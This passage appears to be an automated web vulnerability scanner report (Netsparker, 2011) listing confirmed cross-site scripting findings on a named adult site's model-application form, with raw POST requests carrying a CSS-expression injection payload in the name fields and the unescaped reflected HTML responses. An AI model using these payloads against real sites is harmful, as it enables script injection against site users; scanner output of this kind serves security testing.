</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
</div> </div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. </p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information..
- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST 3
model_email POST netsparker@example.com
model_firstname POST " stYle="x:expre/**/ssion(alert(9))
model_gender POST female
model_lastname POST Smith
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=5b5bd18e8c22435383811bdc6f8a8149
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1671
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_1"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_2"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_3"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_4"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_5"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="available_6"

1
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_city"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_email"

netsparker@example.com
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_firstname"

" stYle="x:expre/**/ssion(netsparker(9))
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_gender"

female
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_lastname"

Smith
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_moreinfo"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="model_phone"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic1"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic2"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic3"

3
--5b5bd18e8c22435383811bdc6f8a8149
Content-Disposition: form-data; name="pic4"

3
--5b5bd18e8c22435383811bdc6f8a8149--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:14:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4934
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="Smith"><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="3"><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="netsparker@example.com"><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
</div> </div><!--closes section_wrapper--> <script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script> <script type="text/javascript"> var bodyHeight = parseInt($j("body").css("height")); var boxThWidth = parseInt($j("#boxThSel").css("width")); var windowWidth, boxFade, marginValue; function fadeObject (elementFade , value) { $j(elementFade).animate({ opacity: value }, 1000 ); } function ignoreCloseThAlert(cookieName) { setCookie(cookieName, 1); fadeOut('#boxThSel' , 0); fadeOut('#bkg-container' , 0); $j("#boxThSel").css("display" , "none"); $j("#bkg-container").css("display" , "none"); } function fadeOut(boxToFade , numberValue) { fadeObject (boxToFade , numberValue); return false; } function positionBox(marginValue) { if($j(window).width() > 965 ){ windowWidth = $j(window).width(); //$j("#boxThSel").css("left", (windowWidth /2 ) - (boxThWidth - marginValue) + "px"); } } $j(document).ready(function (){ $j("#bkg-container").css("height" , bodyHeight + "px"); }); try { var pageTracker = _gat._getTracker("UA-2623535-1"); pageTracker._setDomainName(".pornhub.com"); pageTracker._setAllowHash(false); pageTracker._setSampleRate("10"); pageTracker._trackPageview(); pageTracker._trackPageLoadTime(); } catch(err) {} </script> <div style="clear:both;"> <p class="footer"> The PornHub team is always updating and adding more porn videos every day. It's all here and 100% free porn. We have a huge free DVD selection that you can download or stream. PornHub is the most complete and revolutionary porn tube site. We offer streaming porn videos, downloadable DVDs, photo albums, and the number 1 free sex community on the net. We&rsquo;re always working towards adding more features that will keep your porno addiction alive and well. Send us feedback if you have any questions/comments. </p> <p class="footer"> Pornhub.com, 2011 &middot; <a href="/information#faq" rel="nofollow">FAQ</a> &middot; <a href="/information#terms" rel="nofollow">terms and conditions</a> &middot; <a href="/information#privacy" rel="nofollow">privacy policy</a> &middot; <a href="/information#dmca" rel="nofollow">DMCA</a> &middot; <a href="/information#btn-2257" rel=&qu..
- /model

/model CONFIRMED

http://www.pornhub.com/model

Parameters

Parameter Type Value
available_1 POST 1
available_2 POST 1
available_3 POST 1
available_4 POST 1
available_5 POST 1
available_6 POST 1
model_city POST 3
model_email POST netsparker@example.com
model_firstname POST Smith
model_gender POST female
model_lastname POST " stYle="x:expre/**/ssion(alert(9))
model_moreinfo POST 3
model_phone POST 3
pic1 POST 3
pic2 POST 3
pic3 POST 3
pic4 POST 3

Request

POST /model HTTP/1.1
Referer: http://www.pornhub.com/model
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=2fc2828184a34dea961421e5135dac47
Host: www.pornhub.com
Cookie: phub_in_player_security_key=a9b54de6d9c68db61c3dbc6c20a3976f; phub_in_player=4
Content-Length: 1671
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_1"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_2"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_3"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_4"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_5"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="available_6"

1
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_city"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_email"

netsparker@example.com
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_firstname"

Smith
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_gender"

female
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_lastname"

" stYle="x:expre/**/ssion(netsparker(9))
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_moreinfo"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="model_phone"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic1"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic2"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic3"

3
--2fc2828184a34dea961421e5135dac47
Content-Disposition: form-data; name="pic4"

3
--2fc2828184a34dea961421e5135dac47--

Response

HTTP/1.1 200 OK
Date: Thu, 02 Jun 2011 10:14:56 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 4933
Keep-Alive: timeout=2
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <link rel="shortcut icon" href="http://www.pornhub.com/favicon.ico" /> <link rel="alternate" type="text/html" media="handheld" href="http://m.pornhub.com" title="Mobile/PDA" /> <meta http-equiv="content-language" content="en" /> <meta name="keywords" content="porn, sex, free porn, porn community, sex movies, amateur sex, youtube of porn, pornhub, pornstars, full sex videos, porn videos" /> <meta name="description" content="The World Famous Pornhub.com, Porn hub is the ultimate free sex community. Amateurs upload, Pornstars have sex, and interact with each other. Download full porn videos." /> <title>Become a Pornstar Model</title> <!-- BEGIN ADCODE BLOCK --> <script type="text/javascript"> (function() { var rts = document.createElement('script'); rts.type = 'text/javascript'; rts.async = true; rts.src = ('https:' == document.location.protocol ? 'https://' : 'http://') + 'rts.phn.doublepimp.com/Publishers/56c976c1dc.js?random=' + Math.floor(89999999*Math.random()+10000000) + '&amp;millis='+new Date().getTime(); var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(rts, s); })(); </script> <!-- END ADCODE BLOCK --> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/common.css" type="text/css" /> <!--[if lte IE 7]> <link rel="stylesheet" href="http://cdn1.static.pornhub.phncdn.com/css/ie.css" type="text/css" /> <![endif]--> <script type="text/javascript" src="http://www.google.com/jsapi"></script> <script type="text/javascript">/*<![CDATA[*/ google.load("jquery", "1.4.2"); /*]]>*/</script> <script type="text/javascript">/*<![CDATA[*/ google.load("jqueryui", "1.7.2"); /*]]>*/</script> <script type="text/javascript"> var $j = jQuery.noConflict(); </script> <script type="text/javascript">/*<![CDATA[*/ google.load("mootools", "1.2.3"); /*]]>*/</script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/phub.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/signin.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/Silverlight.js"></script> <script type="text/javascript" src="http://cdn1.static.pornhub.phncdn.com/js/bar.js"></script> <link rel="alternate" type="application/rss+xml" title="PornHub - RSS Feed" href="/rss" /> </head><body class="relative" style="z-index: 1;"><div id='popup_box'></div> <div id="signin_container" style="display:none;z-index:10;"> <div id="signin_border"></div> <div id="signin_background" style="background:transparent url(http://cdn1.static.pornhub.phncdn.com/images/signin_back_en.jpg) no-repeat 0 0;"> <div class="signin_error" style="top:84px;left:38px;display:none;"></div> <p class="signin_error" style="top:54px;left:38px;display:none;"></p> <p id="signin_loggingin" style="top:214px;left:125px;width:172px;text-align:center;display:none;">Logging in...</p> <a id="signin_forgotpassword" href="/front/lost_password" onclick="pageTracker._trackEvent('Login Page', 'Click Lost Password');" style="top:254px;left:125px;">Forgot Username or Password?</a> <a id="signin_confirmationemail" href="/front/resend_confirmation_email" onclick="pageTracker._trackEvent('Login Page', 'Click Resend Confirmation');" style="top:278px;left:125px;">Did not receive confirmation email?</a> <input type="hidden" id="signin_url" value="/login" /> <input type="hidden" id="signin_redirectTo" value="/model" /> <input id="signin_username" maxlength="18" class="signup_field" style="top: 95px; left:134px;" /> <input type="password" id="signin_password" maxlength="40" class="signup_field" style="top: 130px; left: 134px;" /> <input type="checkbox" id="signin_remember" value="1" style="top:166px;left:127px;" /> <button id="signin_submit" class="signup_button" style="top:210px;left:125px;">Login</button> <button class="signup_button" style="top:288px;left:582px;" onclick="window.location='/join_membership_plus?fa=1'">Sign up!</button> <button id="signin_close" style="top:5px;left:830px;"></button> </div> </div><div class="wrapper"><div class="header-wrapper"><div class="header02-nf"> <div class="logo-nf" style="width:335px;height:81px;overflow:hidden;"> <a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Logo');"> <img src="http://cdn1.static.pornhub.phncdn.com/images/pornhub_logo_en.png" alt="Pornhub" /> </a> </div> <!-- TOP RIGHT MENU --> <div class="top-right-menu-nf"> <a href="/uploader" onclick="pageTracker._trackEvent('Header Tabs', 'Upload');">Upload</a> l <a href="/blog" onclick="pageTracker._trackEvent('Header Tabs', 'Pornhub Blog');">Blog</a> l <a href="/gay" onclick="pageTracker._trackEvent('Header Tabs', 'Gay Porn');">Gay Porn</a> l <a id="header_login_link" href="javascript:signinbox.show();" onclick="pageTracker._trackEvent('Header Tabs', 'Login');">Login</a> l <a href="/join_membership_plus?fa=1" onclick="pageTracker._trackEvent('Header Tabs', 'Sign Up');">Sign Up</a> </div> <div class="flag-wrapper"> <ul> <li class="buttons-img" style="margin:-2px 0 0;"><a class="display-block" rel="nofollow" style="width:20px; height:21px; background-position:0 -68px;" href="http://twitter.com/pornhub" target="_blank"></a></li> <li class="flags-title">Language</li> <li class="buttons-img flag english"><a href="http://www.pornhub.com/model" class='active' onclick="pageTracker._trackEvent('Language Flags', 'English');"><span>English</span></a></li> <li class="buttons-img flag german"><a href="http://de.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'German');"><span>Deutsch</span></a></li> <li class="buttons-img flag french"><a href="http://fr.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'French');"><span>Fran&ccedil;ais</span></a></li> <li class="buttons-img flag mx"><a href="http://es.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Spanish');"><span>Espa&ntilde;ol</span></a></li> <li class="buttons-img flag italian"><a href="http://it.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Italian');"><span>Italiano</span></a></li> <li class="buttons-img flag portugese"><a href="http://pt.pornhub.com/model" onclick="pageTracker._trackEvent('Language Flags', 'Portugese');"><span>Portugu&ecirc;s</span></a></li> </ul> <div class="main-sprite language-marker" style="display:none;"></div> </div> <div class="wrapper-main-menu-nf"> <ul><li class="wide-btn-title wide-btn-title nf-home-main-menu"><a href="/" onclick="pageTracker._trackEvent('Header Tabs', 'Home Tab');">Home</a></li><li class="wide-btn-title"><a href="/video" onclick="pageTracker._trackEvent('Header Tabs', 'Videos Tab');">Videos</a></li><li class="wide-btn-title"><a href="/categories" onclick="pageTracker._trackEvent('Header Tabs', 'Categories Tab');">Categories</a></li> <li class="wide-btn-title"><a href="http://enter.pornhubpremium.com/track/NTQ1MzoyNTozNg/" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Premium Tab');" target="_self">Premium</a></li> <li class="wide-btn-title"><a target="_blank" href="http://mbs.pornhublive.com/xtarc/595728/437/0/?mta=338243" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Live Sex Tab');">Live Sex</a></li> <li class="wide-btn-title"><a target="_blank" href="http://ads.genericlink.com/ads/site/pornhub/dispatcher/ph_na_datingtab.php" rel="nofollow" onclick="pageTracker._trackEvent('Header Tabs', 'Real Sex Tab');">Get Laid</a></li> <li class="wide-btn-title"><a href="/community" rel="nofollow" class="" onclick="pageTracker._trackEvent('Header Tabs', 'Community Tab');">Community</a></li> <li class="wide-btn-title nf-search-main-menu"> <form id="search_form" method="get" action="/video/search" onsubmit="if(document.getElementById('search_value').value=='' || document.getElementById('search_value').value=='Search...') return false;"> <fieldset class="fs-nf"> <input class="main-sprite search-input-nf" type="text" onblur="if(this.value=='') {this.value = 'Search...';}" onfocus="if(this.value=='Search...') {this.value = '';}" value="Search..." name="search" maxlength="75" id="search_value" /> <input type="submit" value="" style="display:none" /> <input type="image" class="btn-search-top-menu-nf" src="http://cdn1.static.pornhub.phncdn.com/images/btn-search-nf.gif" value="search" /> </fieldset> </form> </li> </ul> </div> </div></div><div class="container"><div id="model_container">
<p id="model_title">Pornhub Advertising</p>
<p id="model_description">
If your an aspiring young female model and have ever thought of starting a career in the adult industry, well look no further!
Here's the first step you need to take in order to make your dream become a reality. Fill out the form below and you will be contacted by us if you have what it takes.
</p>
<p id="model_error">Your submition contains some errors. Please correct them and try again.</p> <form id="model_form" method="post" enctype="multipart/form-data">
<ul id="model_application">
<li>Must be 18 years of age or older</li>
<li>Willing to travel</li>
<li>We require nude pictures (front, back, face)</li>
<li>We pay all travel expenses, lodging and food</li>
<li>Must be open to participate in adult oriented content</li>
</ul>
<div id="model_information">
<label for="model_firstname">First name:</label><input type="text" id="model_firstname" name="model_firstname" value="Smith"><br />
<label for="model_lastname">Last name:</label><input type="text" id="model_lastname" name="model_lastname" value="" stYle="x:expre/**/ssion(netsparker(9)) "><br />
<label for="model_phone">Phone number:</label><input type="text" id="model_phone" name="model_phone" value="3"><br />
<label for="model_phone">City, Country:</label><input type="text" id="model_city" name="model_city" value="3"><br />
<label for="model_email">E-mail:</label><input type="text" id="model_email" name="model_email" value="netsparker@example.com"><br />
<label for="model_gender">Gender:</label><select id="model_gender" name="model_gender"><option selected="selected" value="female">Female</option></select>
</div>
<textarea id="model_moreinfo" name="model_moreinfo">3</textarea>
<div id="model_available">
<input type="checkbox" id="available_1" name="available_1" value="1" checked="checked"><label for="available_1">Anal</label><br />
<input type="checkbox" id="available_2" name="available_2" value="1" checked="checked"><label for="available_2">Boy / Girl</label><br />
<input type="checkbox" id="available_3" name="available_3" value="1" checked="checked"><label for="available_3">Girl / Girl</label><br />
<input type="checkbox" id="available_4" name="available_4" value="1" checked="checked"><label for="available_4">Boy / Boy / Girl</label><br />
<input type="checkbox" id="available_5" name="available_5" value="1" checked="checked"><label for="available_5">Boy / Girl / Girl</label><br />
<input type="checkbox" id="available_6" name="available_6" value="1" checked="checked"><label for="available_6">DP</label>
</div>
<div id="model_pics" style="border:1px solid red;">
<label for="pic1">Pic #1:</label><input type="file" id="pic1" name="pic1"><br />
<label for="pic2">Pic #2:</label><input type="file" id="pic2" name="pic2"><br />
<label for="pic3">Pic #3:</label><input type="file" id="pic3" name="pic3"><br />
<label for="pic4">Pic #4:</label><input type="file" id="pic4" name="pic4">
</div>
<p id="model_note"><b>Note:</b> Applications submitted by men will be disregarded and you will not receive a response.</p>
<input type="submit" id="model_submit" value="Submit form">
</form>
